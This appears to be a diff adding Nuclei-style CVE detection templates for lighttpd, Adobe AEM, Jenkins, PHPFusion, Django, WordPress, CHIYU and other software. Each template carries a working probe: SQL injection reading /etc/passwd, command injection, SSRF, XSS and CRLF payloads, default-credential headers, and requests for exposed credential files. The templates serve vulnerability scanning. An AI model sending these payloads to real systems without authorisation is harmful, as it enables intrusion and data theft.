More CVEs Template

cves/2014/CVE-2014-2323.yaml

@@ -0,0 +1,21 @@
+id: CVE-2014-2323
+
+info:
+  name: Lighttpd 1.4.34 SQL injection and path traversal
+  description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
+  reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
+  author: geeknik
+  severity: critical
+  tags: cve,cve2014,sqli,lighttpd
+
+requests:
+  - raw:
+      - |+
+        GET /etc/passwd HTTP/1.1
+        Host: [::1]' UNION SELECT '/
+
+    unsafe: true
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"

cves/2016/CVE-2016-0957.yaml

@@ -0,0 +1,28 @@
+id: CVE-2016-0957
+
+info:
+  name: Adobe AEM Console Disclosure
+  author: geeknik
+  description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
+  reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
+  severity: high
+  tags: cve,cve2016,adobe,aem
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system/console?.css"
+    header:
+      - Authorization: "Basic YWRtaW46YWRtaW4K"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Adobe"
+          - "java.lang"
+          - "(Runtime)"
+        condition: and

cves/2018/CVE-2018-1000600.yaml

@@ -0,0 +1,22 @@
+id: CVE-2018-1000600
+
+info:
+  name: Pre-auth Fully-responded SSRF
+  description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
+  reference:
+    - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
+    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
+  author: geeknik
+  severity: medium
+  tags: cve,cve2018,jenkins,ssrf,oob
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

cves/2020/CVE-2020-24949.yaml

@@ -0,0 +1,26 @@
+id: CVE-2020-24949
+
+info:
+  name: PHPFusion 9.03.50 Remote Code Execution
+  author: geeknik
+  severity: high
+  description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+  reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
+  tags: cve,cve2020,phpfusion,rce,php
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "infusion_db.php"

cves/2020/CVE-2020-9402.yaml

@@ -0,0 +1,26 @@
+id: CVE-2020-9402
+
+info:
+  name: Django SQL Injection
+  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL.
+  reference: |
+    - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
+    - https://docs.djangoproject.com/en/3.0/releases/security/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
+  author: geeknik
+  severity: high
+  tags: cve,cve2020,django,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"
+
+    matchers:
+      - type: word
+        words:
+          - "DatabaseError at"
+          - "ORA-29257:"
+          - "ORA-06512:"
+          - "Request Method:"
+        condition: and

cves/2021/CVE-2021-24291.yaml

@@ -0,0 +1,31 @@
+id: CVE-2021-24291
+
+info:
+  name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+  author: geeknik
+  description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+  reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+  severity: medium
+  tags: cve,cve2021,xss,wordpress,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        words:
+          - "onmouseover=alert(document.domain)//"
+          - "wp-content/uploads/photo-gallery"
+        condition: and

cves/2021/CVE-2021-31249.yaml

@@ -0,0 +1,26 @@
+id: CVE-2021-31249
+
+info:
+  name: CHIYU TCP/IP Converter devices - CRLF injection
+  author: geeknik
+  description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
+  reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+  severity: medium
+  tags: cve,cve2021,chiyu,crlf,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        part: header
+        words:
+          - "Location: setting.htm"
+          - "<script>alert(document.domain)</script>"
+        condition: and

cves/2021/CVE-2021-31250.yaml

@@ -0,0 +1,28 @@
+id: CVE-2021-31250
+
+info:
+  name: CHIYU IoT XSS
+  author: geeknik
+  description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+  reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+  severity: medium
+  tags: cve,cve2021,chiyu,xss,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"
+    headers:
+      Authorization: "Basic OmFkbWlu"
+
+    redirects: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: word
+        part: body
+        words:
+          - "\"><script>alert({{randstr}})</script>"

cves/2021/CVE-2021-31581.yaml

@@ -0,0 +1,27 @@
+id: CVE-2021-31581
+
+info:
+  name: Akkadian Provisioning Manager MariaDB Credentials
+  author: geeknik
+  reference:
+    - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
+    - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
+  severity: medium
+  tags: cve,cve2021,akkadian,mariadb,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pme/database/pme/phinx.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "host:"
+          - "name:"
+          - "pass:"
+        condition: and

cves/2021/CVE-2021-33221.yaml

@@ -0,0 +1,32 @@
+id: CVE-2021-33221
+
+info:
+  name: CommScope Ruckus IoT Controller Unauthenticated Service Details
+  author: geeknik
+  description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).
+  reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
+  severity: medium
+  tags: cve,cve2021,commscope,ruckus,debug
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/service/v1/service-details"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "application/json"
+      - type: word
+        words:
+          - "message"
+          - "ok"
+          - "data"
+          - "dns"
+          - "gateway"
+        condition: and
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-3377.yaml

@@ -0,0 +1,29 @@
+id: CVE-2021-3377
+
+info:
+  name: Ansi_up XSS
+  description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
+  reference: |
+        - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
+        - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
+  author: geeknik
+  severity: medium
+
+requests:
+  - raw:
+      - |+
+        GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        words:
+          - "com\"/onmouseover=\"alert(1)\">"

cves/2021/CVE-2021-33904.yaml

@@ -0,0 +1,31 @@
+id: CVE-2021-33904
+
+info:
+  name: Accela Civic Platform 21.1 - 'servProvCode' XSS
+  author: geeknik
+  description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
+  reference: https://www.exploit-db.com/exploits/49980
+  severity: medium
+  tags: cve,cve2021,accela,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        words:
+          - '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
+          - 'servProvCode'
+        condition: and
+
+      - type: status
+        status:
+          - 200